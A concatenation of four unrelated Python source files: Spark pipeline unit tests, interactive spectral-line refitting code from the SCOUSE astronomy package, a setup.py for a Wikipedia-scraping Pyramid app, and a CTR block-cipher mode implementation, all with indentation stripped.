rows = [("get_user", 3)]
df = self.spark.createDataFrame(rows, ["identifier", "frequency"])
data = Rower(lambda x: {"identifier": x[0], "frequency": x[1]})(df.rdd)
self.assertEqual(data.count(), 1)
self.assertEqual(data.collect()[0].identifier, "get_user")
self.assertEqual(data.collect()[0].frequency, 3)
def test_dzhigurda(self):
self.assertEqual(DzhigurdaFiles(0)(self.engine.repositories).count(), 325)
self.assertEqual(DzhigurdaFiles(10)(self.engine.repositories).count(), 3490)
self.assertEqual(DzhigurdaFiles(-1)(self.engine.repositories).count(), 27745)
def test_identity(self):
# load parquet
loader = ParquetLoader(session=self.spark, paths=PARQUET_DIR)
data = loader.execute()
# check that identity returns the same RDD
data_identity = Identity()(data)
self.assertEqual(data_identity.count(), 6)
self.assertEqual(data_identity, data)
def test_distinct(self):
rows = [("foo_bar", 3), ("baz", 5), ("foo_bar", 3)]
df = self.spark.createDataFrame(rows, ["identifier", "frequency"])
self.assertEqual(set(rows), set(Distinct()(df).collect()))
def test_cacher(self):
persistence = SparkDefault.STORAGE_LEVEL
cacher = Cacher(persistence)
cached_data = cacher(self.data)
self.assertTrue(cached_data.is_cached)
self.assertEqual(cacher.persistence, getattr(StorageLevel, persistence))
self.assertIn("head", cacher.__getstate__())
cacher = Cacher.maybe(persistence=None)
uncached_data = cacher(self.data)
self.assertEqual(uncached_data, self.data)
cacher = Cacher.maybe(persistence)
cached_data = cacher(self.data)
self.assertTrue(cached_data.is_cached)
cached_data = Cacher.maybe(persistence)(self.data)
self.assertFalse(cached_data.unpersist().is_cached)
def test_ignition(self):
start_point = Ignition(self.engine)
columns = start_point(self).columns
self.assertNotIn("engine", start_point.__getstate__())
self.assertEqual(columns, ["id", "urls", "is_fork", "repository_path"])
def test_repositories_filter(self):
start_point = Ignition(self.engine)
repos = start_point.link(RepositoriesFilter(".*antoniolg.*")).link(Collector()).execute()
self.assertEqual(len(repos), 1)
self.assertEqual(repos[0].id, "github.com/antoniolg/androidmvp.git")
def test_head_files(self):
df = HeadFiles()(self.engine.repositories)
df_as_dict = df.first().asDict()
keys = set(df_as_dict.keys())
self.assertIn("commit_hash", keys)
self.assertIn("path", keys)
self.assertIn("content", keys)
self.assertIn("reference_name", keys)
def test_uast_extractor(self):
df = HeadFiles()(self.engine.repositories)
df_uast = UastExtractor()(df)
self.assertIn("uast", df_uast.columns)
def test_uast_deserializer(self):
df = HeadFiles()(self.engine.repositories)
df_uast = UastExtractor()(df)
r2d = UastRow2Document()
row_uast = r2d.documentize(df_uast.first())
uasts_empty = list(UastDeserializer().deserialize_uast(df.first()))
uasts = list(UastDeserializer().deserialize_uast(row_uast))
self.assertEqual(len(uasts_empty), 0)
self.assertGreater(len(uasts), 0)
def test_csv_saver(self):
with tempfile.TemporaryDirectory() as tmpdir:
dirname = tmpdir
# load and save data
rows = [("Alice", 1)]
df = self.spark.createDataFrame(rows, ["name", "age"])
CsvSaver(dirname)(df.rdd)
# read saved data and check it
for root, d, files in os.walk(dirname):
for f in files:
filename = os.path.join(root, f)
if filename.endswith(".csv"):
with open(filename) as f:
reader = csv.reader(f)
next(reader)
data = [r for r in reader]
self.assertEqual(len(data), 1)
self.assertEqual(data[0][0], rows[0][0])
self.assertEqual(int(data[0][1]), rows[0][1])
def test_parquet_saver(self):
with tempfile.TemporaryDirectory() as tmpdir:
dirname = tmpdir
try:
# load and save data
rows = [("Alice", 1)]
df = self.spark.createDataFrame(rows, ["name", "age"])
ParquetSaver(dirname + "/", explain=True)(df.rdd)
ParquetSaver(dirname + "2/")(df.rdd)
# read saved data and check it
data = ParquetLoader(session=self.spark, paths=dirname).execute()
self.assertEqual(data.count(), 1)
finally:
shutil.rmtree(dirname)
def test_collector(self):
data = ParquetLoader(session=self.spark, paths=PARQUET_DIR).link(Collector()) \
.execute()
self.assertEqual(len(data), 6)
def test_first(self):
row = ParquetLoader(session=self.spark, paths=PARQUET_DIR).link(First()) \
.execute()
self.assertIsInstance(row, Row)
def test_field_selector(self):
rows = [("Alice", 1)]
df = self.spark.createDataFrame(rows, ["name", "age"])
# select field "name"
row = FieldsSelector(fields=["name"], explain=True)(df.rdd).first()
self.assertFalse(hasattr(row, "age"))
self.assertTrue(hasattr(row, "name"))
# select field "age"
row = FieldsSelector(fields=["age"])(df.rdd).first()
self.assertTrue(hasattr(row, "age"))
self.assertFalse(hasattr(row, "name"))
# select field "name" and "age"
row = FieldsSelector(fields=["name", "age"])(df.rdd).first()
self.assertTrue(hasattr(row, "age"))
self.assertTrue(hasattr(row, "name"))
def test_language_selector(self):
language_selector = LanguageSelector(languages=["XML", "YAML"], blacklist=True)
df = language_selector(HeadFiles()(self.engine.repositories).classify_languages())
langs = [x.lang for x in df.select("lang").distinct().collect()]
self.assertEqual(langs, ["Markdown", "Gradle", "Text", "INI",
"Batchfile", "Python", "Java", "Shell"])
language_selector = LanguageSelector(languages=["Python", "Java"], blacklist=False)
df = language_selector(HeadFiles()(self.engine.repositories).classify_languages())
langs = [x.lang for x in df.select("lang").distinct().collect()]
self.assertEqual(langs, ["Python", "Java"])
if __name__ == '__main__':
unittest.main()
|
# Licensed under an MIT open source license - see LICENSE
"""
SCOUSE - Semi-automated multi-COmponent Universal Spectral-line fitting Engine
Copyright (c) 2016-2018 Jonathan D. Henshaw
CONTACT: henshaw@mpia.de
"""
import numpy as np
import itertools
import matplotlib.pyplot as plt
import sys
from matplotlib import pyplot
from matplotlib.patches import Rectangle
from .stage_2 import *
from .stage_3 import get_flux, get_indiv_spec, fit_indiv_spectra
from .stage_5 import *
Fitter = Stage2Fitter()
fitting = Fitter.preparefit
from .saa_description import *
from .interactiveplot import showplot
from .solution_description import fit, print_fit_information
from .indiv_spec_description import *
def event_loop():
fig = plt.gcf()
while plt.fignum_exists(fig.number):
try:
# using just a few little bits of plt.pause below
plt.gcf().canvas.draw()
plt.gcf().canvas.start_event_loop(0.1)
time.sleep(0.1)
except KeyboardInterrupt:
break
def check_blocks(scouseobject):
"""
Checks the current check_spec_indices against those in check_block_indices
and gets rid of any duplicates
"""
_check_spec_indices=list(scouseobject.check_spec_indices)
_check_block_indices=list(scouseobject.check_block_indices)
_block_indices = []
# Firstly get the indices associated with the blocks
nxblocks, nyblocks, blockarr = get_blocks(scouseobject, scouseobject.blocksize)
spec_mask = pad_spec(scouseobject, scouseobject.blocksize, nxblocks, nyblocks)
# cycle through the blocks and check the indices against _check_spec_indices
for blocknum in _check_block_indices:
keep = (blockarr == blocknum)
speckeys = spec_mask[keep]
speckeys = [key for key in speckeys if np.isfinite(key)]
block_indices = np.array(speckeys)
sortidx = argsort(block_indices)
block_indices = block_indices[sortidx]
_block_indices += list(block_indices)
# remove any keys from _check_spec_indices that are in _block_indices as they
# will be fit anyway
_check_spec_indices = [key for key in _check_spec_indices if not key in _block_indices]
return _check_spec_indices
def get_block_indices(scouseobject, blocknum):
"""
Returns a list of indices for the spectra contained within the blocks
"""
nxblocks, nyblocks, blockarr = get_blocks(scouseobject, scouseobject.blocksize)
spec_mask = pad_spec(scouseobject, scouseobject.blocksize, nxblocks, nyblocks)
keep = (blockarr == blocknum)
speckeys = [int(key) for key in spec_mask[keep] if np.isfinite(key)]
block_indices = np.sort(speckeys)
return block_indices
def gen_2d_coords(scouseobject,block_indices):
"""
Takes flattened indices and returns an array of the 2D indices
"""
coords=[]
for idx in block_indices:
_coords = np.unravel_index(idx, scouseobject.cube.shape[1:])
coords.append(np.asarray(_coords))
coords = np.asarray(coords)
return coords
def gen_pseudo_SAA(scouseobject, coords, block_dict, blocknum, spec):
"""
Creates an SAA from a list of individual spectra
"""
# Create spatially averaged spectrum
for ycrd, xcrd in coords:
indivspec = scouseobject.cube[:, ycrd, xcrd].value
spec[:] += indivspec
spec = spec/len(coords[:,0])
# Create a pseudo-SAA
SAA = saa([blocknum,blocknum], spec,
idx=blocknum, sample=True, scouse=scouseobject)
block_dict[blocknum] = SAA
add_ids(SAA, list(coords))
return SAA
def initialise_indiv_spectra_s6(scouseobject, SAA, njobs):
"""
Initialise the spectra for fitting
"""
indiv_spectra = {}
# Parallel
if njobs > 1:
args = [scouseobject, SAA]
inputs = [[k] + args for k in range(len(SAA.indices_flat))]
# Send to parallel_map
indiv_spec = parallel_map(get_indiv_spec, inputs, numcores=njobs)
merged_spec = [spec for spec in indiv_spec if spec is not None]
merged_spec = np.asarray(merged_spec)
for k in range(len(SAA.indices_flat)):
# Add the spectra to the dict
key = SAA.indices_flat[k]
indiv_spectra[key] = merged_spec[k]
else:
for k in range(len(SAA.indices_flat)):
key = SAA.indices_flat[k]
args = [scouseobject, SAA]
inputs = [[k] + args]
inputs = inputs[0]
indiv_spec = get_indiv_spec(inputs)
indiv_spectra[key] = indiv_spec
add_indiv_spectra(SAA, indiv_spectra)
def manually_fit_blocks(scouseobject, block_dict, blocknum):
"""
Manual fitting of the individual blocks
"""
# determine how many fits we will actually be performing
#n_to_fit = sum([block_dict[blocknum].to_be_fit
# for blocknum in scouseobject.check_block_indices])
# Loop through the SAAs
#for ind, block_ind in enumerate(scouseobject.check_block_indices):
# print("Fitting {0} out of {1}".format(ind+1, n_to_fit))
SAA = block_dict[blocknum]
with warnings.catch_warnings():
# This is to catch an annoying matplotlib deprecation warning:
# "Using default event loop until function specific to this GUI is implemented"
warnings.simplefilter('ignore', category=DeprecationWarning)
bf = fitting(scouseobject, SAA, block_dict, blocknum,
training_set=False,
init_guess=True)
def auto_fit_blocks(scouseobject, block_dict, njobs, blocksize, verbose=False):
"""
automated fitting of the blocks
"""
indiv_dictionary = {}
# Fit the spectra
fit_indiv_spectra(scouseobject, block_dict, blocksize/3, \
njobs=njobs, spatial=False, verbose=verbose, stage=6)
for block_ind in scouseobject.check_block_indices:
SAA = block_dict[block_ind]
for key in SAA.indices_flat:
spectrum = scouseobject.indiv_dict[key]
bfmodel = spectrum.model
alternatives = spectrum.models
models = []
models.append([bfmodel])
models.append(alternatives)
# Flatten
models = [mod for mods in models for mod in mods]
# Now add this as the best-fitting model and add the others to models
add_bf_model(spectrum, SAA.indiv_spectra[key].model_parent)
update_model_list(spectrum, models)
decision = 'block refit'
add_decision(spectrum, decision)
def get_offsets(radius_pix):
"""
Returns offsets of adjacent pixels
Notes:
For grid size of 3 - returns
_offsets = np.array([[-1,1], [0,1], [1,1], [-1,0], [0,0], [1,0], [-1,-1], [0,-1], [1,-1]])
etc.
"""
arr = np.arange(radius_pix+1)
sym = np.concatenate((arr*-1,arr )).astype(np.int)
sym = np.unique(sym)
_offsets = [pair for pair in itertools.product(sym,sym)]
return _offsets
def neighbours(n_dim, idx, radius_pix):
"""
Returns the indices of adjacent pixels
"""
# Unravel the index of the selected spectrum
unrav_idx = np.unravel_index(idx, n_dim)
# Get all the adjacent neighbours
idxs = [tuple(c) for c in np.add(get_offsets(radius_pix), unrav_idx)]
idxs = np.array(idxs)
# Find out which of those neighbours are valid according to the shape of the
# data cube
validids = np.full(np.shape(idxs), np.nan)
valid = (idxs[:,0] >= 0) & (idxs[:,0] < n_dim[0]) & (idxs[:,1] >= 0) & (idxs[:,1] < n_dim[1])
validids[valid] = idxs[valid,:]
# Package the valid neighburs up and send them back!
indices_adjacent = [np.ravel_multi_index(np.array([int(validids[i,0]), int(validids[i,1])]), n_dim) if np.isfinite(validids[i,0]) else np.nan for i in range(len(validids[:,0]))]
return indices_adjacent
def plot_neighbour_pixels(scouseobject, indices_adjacent, figsize):
"""
Plot neighbours and their model solutions
"""
npix = np.size(indices_adjacent)
# Set up figure page
fig, axes = pyplot.subplots(int(np.sqrt(npix)), int(np.sqrt(npix)), figsize=figsize)
fig.canvas.mpl_connect('key_press_event', keyentry)
fig.patch.set_facecolor('black')
fig.patch.set_alpha(0.05)
plt.suptitle("Checking spectrum and its neighbours. Press 'enter' to continue.")
ax = [a for axis in axes[::-1] for a in axis]
for i, key in enumerate(indices_adjacent, start=0):
if np.isfinite(key) and key in scouseobject.indiv_dict:
spectrum = scouseobject.indiv_dict[key]
# Get the correct subplot axis
axis = ax[i]
# First plot the Spectrum
axis.plot(scouseobject.xtrim, get_flux(scouseobject, spectrum), 'k-', drawstyle='steps', lw=1)
# Recreate the model from information held in the solution
# description
bfmodel = spectrum.model
mod, res = recreate_model(scouseobject, spectrum, bfmodel)
# now overplot the model
if bfmodel.ncomps == 0.0:
axis.plot(scouseobject.xtrim, mod[:,0], 'b-', lw=1)
else:
for k in range(int(bfmodel.ncomps)):
axis.plot(scouseobject.xtrim, mod[:,k], 'b-', lw=1)
if i != round((npix/2)-0.5):
axis.patch.set_facecolor('blue')
axis.patch.set_alpha(0.1)
else:
# Get the correct subplot axis
axis = ax[i]
axis.plot(0.5, 0.5, 'kx', transform=axis.transAxes, ms=10)
axis.patch.set_facecolor('blue')
axis.patch.set_alpha(0.1)
pyplot.tight_layout(rect=[0, 0.03, 1, 0.95])
pyplot.show()
event_loop()
def keyentry(event):
"""
What happens following a key entry
"""
if event.key == 'enter':
plt.close()
return
def plot_alternatives(scouseobject, key, figsize, plot_residuals=False):
"""
Plot the spectrum to be checked and its alternatives
"""
spectrum = scouseobject.indiv_dict[key]
bfmodel = spectrum.model
alternatives = spectrum.models
allmodels = []
allmodels.append([bfmodel])
allmodels.append(alternatives)
# Flatten
allmodels = [mod for mods in allmodels for mod in mods]
lenmods = np.size(allmodels)
# Set up figure page
fig, ax = pyplot.subplots(1, lenmods, figsize=[12,5])
for i in range(lenmods):
# Get the correct subplot axis
if lenmods == 1:
axis = ax
else:
axis = ax[i]
bfmodel = allmodels[i]
# First plot the Spectrum
axis.plot(scouseobject.xtrim, get_flux(scouseobject, spectrum), 'k-', drawstyle='steps', lw=1)
# Recreate the model from information held in the solution
# description
mod,res = recreate_model(scouseobject, spectrum, bfmodel)
# now overplot the model
if bfmodel.ncomps == 0.0:
axis.plot(scouseobject.xtrim, mod[:,0], 'b-', lw=1)
else:
for k in range(int(bfmodel.ncomps)):
axis.plot(scouseobject.xtrim, mod[:,k], 'b-', lw=1)
if plot_residuals:
axis.plot(scouseobject.xtrim, res,'g-', drawstyle='steps', lw=1)
# Create the interactive plot
intplot = showplot(fig, ax, keep=True)
fig.canvas.mpl_connect('key_press_event', keyentry)
event_loop()
return allmodels, intplot.subplots
def update_models(scouseobject, key, models, selection):
"""
Here we update the model selection based on the users instructions
"""
spectrum = scouseobject.indiv_dict[key]
if np.size(selection) == 0.0:
# If no selection is made - refit manually
# Make pyspeckit be quiet
with warnings.catch_warnings():
warnings.simplefilter('ignore')
old_log = log.level
log.setLevel('ERROR')
# generate a spectrum
spec = get_spec(scouseobject, spectrum)
log.setLevel(old_log)
#bf = interactive_fitting(scouseobject, spectrum, spec)
bf = Stage6Fitter()(scouseobject, spectrum, spec)
# Now add this as the best-fitting model and add the others to models
add_bf_model(spectrum, bf)
update_model_list(spectrum, models)
decision = 'refit'
add_decision(spectrum, decision)
elif selection[0] != 0.0:
# If any spectrum other than the first is selected then swap this to the
# model and the current best fit to models
bf = models[selection[0]]
models.remove(models[selection[0]])
# Now add this as the best-fitting model and add the others to models
add_bf_model(spectrum, bf)
update_model_list(spectrum, models)
decision = 'alternative'
add_decision(spectrum, decision)
print("")
print("Selection acknowledged. "+
colors.fg._lightgreen_+"Alternative spectrum selected"+colors._endc_+".")
print_fit_information(bf, init_guess=False)
else:
# If the first spectrum was selected then the user has chosen to accept
# the current best-fitting solution - so do nothing.
print("")
print("Selection acknowledged. "+
colors.fg._lightgreen_+"Original solution retained"+colors._endc_+".")
print_fit_information(spectrum.model, init_guess=False)
pass
class Stage6Fitter(object):
def __call__(self, *args):
return self.interactive_fitting(*args)
def interactive_fitting(self, scouseobject, spectrum, spec):
"""
Interactive fitter for stage 6
"""
print("")
print("Beginning interactive fit of spectrum {0}".format(spectrum))
self.residuals_shown = False
self.spec = spec
self.spectrum = spectrum
self.scouseobject = scouseobject
self.happy=False
while not self.happy:
# Interactive fitting with pyspeckit
spec.plotter(xmin=np.min(self.scouseobject.xtrim),
xmax=np.max(self.scouseobject.xtrim))
spec.plotter.figure.canvas.callbacks.disconnect(3)
spec.specfit.clear_all_connections()
spec.specfit(interactive=True,
print_message=False,
xmin=np.min(self.scouseobject.xtrim),
xmax=np.max(self.scouseobject.xtrim))
with warnings.catch_warnings():
warnings.simplefilter('ignore', category=DeprecationWarning)
if plt.matplotlib.rcParams['interactive']:
spec.plotter.axis.figure.canvas.mpl_connect('key_press_event',
self.interactive_callback)
event_loop()
else:
plt.show()
self.happy = self.interactive_callback('noninteractive')
if not hasattr(spec.specfit, 'fitter'):
raise ValueError("No fitter available for the spectrum."
" This can occur if you have plt.ion() set"
" or if you did not fit the spectrum."
)
return self.bf
def interactive_callback(self, event):
"""
A 'callback function' to be triggered when the user selects a fit.
"""
if plt.matplotlib.rcParams['interactive']:
if hasattr(event, 'key'):
if event.key in ('enter'):
if self.residuals_shown:
print("")
print("'enter' key acknowledged."+
colors.fg._lightgreen_+" Solution accepted"+colors._endc_+".")
print("")
self.guesses = self.spec.specfit.parinfo.values
self.happy = True
plt.close(self.spec.plotter.figure.number)
return True
elif event.key == 'esc':
self.happy = False
self.spec.specfit.clear_all_connections()
assert self.spec.plotter._active_gui is None
elif event.key in ('f', 'F'):
print("")
print("'f' key acknowledged."+
colors.fg._lightred_+" Re-entering interactive fitter"+colors._endc_+".")
self.residuals_shown = False
elif event.key in ('d','D','3',3):
# The fit has been performed interactively, but we also
# want to print out the nicely-formatted additional
# information
self.spec.specfit.button3action(event)
self.bf = fit(self.spec, idx=self.spectrum.index,
scouse=self.scouseobject)
self.spec.specfit.plot_fit(show_components=True)
self.spec.specfit.plotresiduals(axis=self.spec.plotter.axis,
clear=False,
color='g',
label=False)
self.residuals_shown = True
print_fit_information(self.bf, init_guess=True)
print("Options:"
"\n"
"1) If you are happy with this fit, press Enter."
"\n"
"2) If not, press 'f' to re-enter the interactive fitter.")
self.happy = None
else:
self.happy = None
elif hasattr(event, 'button') and event.button in ('d','D','3',3):
# The fit has been performed interactively, but we also
# want to print out the nicely-formatted additional
# information
self.bf = fit(self.spec, idx=self.spectrum.index,
scouse=self.scouseobject)
print_fit_information(self.bf, init_guess=True)
print("Options:"
"\n"
"1) If you are happy with this fit, press Enter."
"\n"
"2) If not, press 'f' to re-enter the interactive fitter.")
self.happy = None
else:
self.happy = None
else:
# this should only happen if not triggered by a callback
assert event == 'noninteractive'
# Best-fitting model solution
self.bf = fit(self.spec, idx=self.spectrum.index,
scouse=self.scouseobject)
if self.firstgo == 0:
print("")
print_fit_information(self.bf, init_guess=True)
print("")
else:
print("")
print_fit_information(self.bf, init_guess=False)
print("")
h = input("Are you happy with the fit? (y/n): ")
self.happy = h in ['True', 'T', 'true', '1', 't', 'y', 'yes', 'Y', 'Yes']
print("")
self.firstgo+=1
return self.happy
|
import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
README = open(os.path.join(here, 'README.md')).read()
CHANGES = open(os.path.join(here, 'CHANGES.md')).read()
requires = [
'paste',
'pyramid>=1.0.2',
'pyramid_jinja2==2.5',
'pyramid_debugtoolbar==2.4.1',
'wtforms==2.0.2',
'waitress==0.8.10',
'requests==2.7.0',
'beautifulsoup4==4.4.0',
# test packages
'nose==1.3.7',
'coverage==3.7.1',
'webtest==2.0.18',
# nice to have
'pep8',
'pyflakes',
]
setup(
name='Scrape Wikipedia',
version='0.1a',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
test_suite='scrape_wikipedia',
install_requires=requires,
entry_points="""\
[paste.app_factory]
main = scrape_wikipedia:main
""",
paster_plugins=['pyramid'],
author='Olwethu Ntiyonke',
author_email='olwethu.a@gmail.com',
description='Scrape Wikipedia content table',
keywords='pyramid scrape jinja2 wikipedia wtforms',
long_description=README + '\n\n' + CHANGES,
classifiers=[
"Development Status :: 0.1a - Alpha",
"Programming Language :: Python",
"Framework :: Pylons",
"Topic :: Web scrape",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: WSGI :: Application"
],
)
|
"""
ctr
~~~
This module provides an implementation for the Counter (CTR)
block cipher mode of operation.
Author: Kinshuk Vasisht
Dated : 12/03/2022
"""
import typing
import secrets
from .core import ModeOfOperation
from .padding import PaddingMode
from .utils import xor
class CounterMode(ModeOfOperation):
"""
Implementation of the Counter mode of operation.
This mode of operation divides the plaintext into segments of a fixed block size each, after adding any
padding as required, then the segments are encrypted individually, where each plaintext is XOR-ed with
the encrypted version of IV_i, where the ith IV is defined as IV + i - 1. For the first block, IV_0 = IV.
Encryption:
=> C_i = P_i ^ E(IV + i - 1, K), where
C_i = ciphertext block i,
P_i = plaintext block i
K = key used with the cipher
IV = Initialization Vector
Decryption:
=> P_i = C_i ^ E(IV + i - 1, K), as a result the decryption process
also uses the encryption operation of the cipher.
"""
def __init__(self, cipher, IV = None, padding_mode = PaddingMode.PAD_PKCS7, block_size = None):
""" Creates a new CTR mode of operation instance.
Args:
cipher (BlockCipher): A block cipher providing an encrypt and decrypt method.
IV (str | bytes | None, optional): Initialization vector to use in the operation.
Defaults to None, for which a random IV is generated.
padding_mode (PaddingStrategy, optional): Padding Strategy to use. Defaults to PaddingMode.PAD_ZEROS.
block_size (int | None, optional): Block size used by the cipher. Defaults to None, where it is
inferred from the cipher instance.
"""
super().__init__(cipher, padding_mode, block_size)
self.IV = IV or secrets.token_bytes(self.block_size >> 3)
def encrypt(self, plaintext: "typing.Iterable[str | bytes]", debug = False):
""" Encrypts multiple blocks of data using the CTR mode of operation.
Args:
plaintext (typing.Iterable[str | bytes]): Iterable yielding blocks of plaintext to encrypt.
debug (bool, optional): If true, outputs extra data to view the steps of the procedure.
Yields:
str | bytes: The ciphertext blocks.
"""
# Pad the data to make the length an integral multiple of the block size.
plaintext = self.padding_mode.pad(plaintext, debug)
# Encrypt blocks following the CTR procedure:
last_IV = self.IV
for block_data in plaintext:
if debug: plaintext_block = block_data['padded']
else : plaintext_block = block_data
# IV'_i = E(IV_i, K) = E(IV + i - 1, K)
encrypted_IV = self.cipher.encrypt(last_IV)
# C_i = P_i ^ IV'_i = P_i ^ E(IV + i - 1, K)
ciphertext_block = xor(plaintext_block, encrypted_IV)
if debug:
block_data['encrypted'] = ciphertext_block
block_data['IV'] = last_IV
block_data['E_IV'] = encrypted_IV
yield block_data
else: yield ciphertext_block
IV_bits = int.from_bytes(last_IV, byteorder='big')
# IV_(i+1) = IV_i + 1 = IV + i
last_IV = ((IV_bits + 1) & ((1 << self.block_size) - 1))
last_IV = last_IV.to_bytes(self.block_size >> 3, byteorder='big')
def decrypt(self, ciphertext: "typing.Iterable[str | bytes]", debug = False):
""" Decrypts blocks encrypted using the CBC mode of operation.
Args:
ciphertext (typing.Iterable[str | bytes]): Iterable yielding blocks of ciphertext to decrypt.
debug (bool, optional): If true, outputs extra data to view the steps of the procedure.
Yields:
str | bytes: The plaintext blocks.
"""
# Decrypt blocks following the CBC procedure:
def plaintext_generator():
last_IV = self.IV
for ciphertext_block in ciphertext:
# IV'_i = E(IV_i, K) = E(IV + i - 1, K)
encrypted_IV = self.cipher.encrypt(last_IV)
# C_i = P_i ^ IV'_i = P_i ^ E(IV + i - 1, K)
plaintext_block = xor(ciphertext_block, encrypted_IV)
if debug:
yield {
'encrypted': ciphertext_block,
'decrypted': plaintext_block,
'IV' : last_IV,
'E_IV' : encrypted_IV
}
else: yield plaintext_block
IV_bits = int.from_bytes(last_IV, byteorder='big')
# IV_(i+1) = IV_i + 1 = IV + i
last_IV = ((IV_bits + 1) & ((1 << self.block_size) - 1))
last_IV = last_IV.to_bytes(self.block_size >> 3, byteorder='big')
# Unpad the data to restore the original contents
return self.padding_mode.unpad(plaintext_generator(), debug) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.